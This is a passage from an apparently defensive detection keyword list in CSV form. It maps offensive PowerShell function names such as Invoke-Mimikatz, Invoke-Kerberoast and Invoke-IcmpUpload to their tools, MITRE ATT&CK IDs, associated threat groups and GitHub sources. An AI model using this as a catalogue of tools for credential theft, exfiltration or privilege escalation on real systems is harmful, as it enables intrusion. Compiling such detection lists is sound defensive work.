Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-IcmpDownload*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - 
TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*Invoke-IcmpDownload.ps1*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*Invoke-IcmpUpload.ps1*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*Invoke-ImpersonateUser*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-InjectGEvent*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-InjectGEventAPI*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-InstalledProgramsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-InstalledServicesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-InstalledServicesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Interceptor*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which 
enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-Internalmonologue*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Internalmonologue*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Inveigh*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Inveigh*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Invoke-Inveigh*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-InveighRelay*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - 
T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-InveighRelay.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-IR*,offensive_tool_keyword,Github Username,powershell forensic tools,N/A,N/A,N/A,N/A,Information Gathering,https://github.com/Invoke-IR,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A 
-*Invoke-IronCyclone*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Invoke-JSRatRegsvr*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-JSRatRundll*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-JuicyPotato*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invoke-kerberoast *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*invokekerberoast*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Invoke-Kerberoast*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Invoke-Kerberoast*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - 
APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Kerberoast*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Kerberoast*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - 
TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Invoke-Kerberoast.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Invoke-Keylogger.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-KrbRelay*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-LapsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-LapsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-LdapSignCheck*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into 
Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-LdapSignCheck*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-LocalAdminGroupCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-LocalAdminGroupCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Lockless*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Locksmith.ps1*,offensive_tool_keyword,Locksmith,A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services,T1552.006 - T1222 - T1046,TA0007 - TA0040 - TA0043,N/A,N/A,Discovery,https://github.com/TrimarcJake/Locksmith,1,1,N/A,8,5,472,38,2023-10-02T02:29:08Z,2022-04-28T01:37:32Z 
-*Invoke-LoginPrompt.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*Invoke-LsaProtectionCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-LsaProtectionsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-MachineRoleCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-MalSCCM*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-MalSCCM*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Invoke-MapDomainTrust*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Invoke-Merlin.ps1*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z
-*Invoke-MetaTwin*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z
-*InvokeMeter.bat*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z
-*Invoke-MFASweep*,offensive_tool_keyword,FMFASweep,A tool for checking if MFA is enabled on multiple Microsoft Services,T1595 - T1595.002 - T1078.003,TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/dafthack/MFASweep,1,1,N/A,9,10,1033,152,2023-07-25T05:10:55Z,2020-09-22T16:25:03Z
-*Invoke-Mimikatz*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 function name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
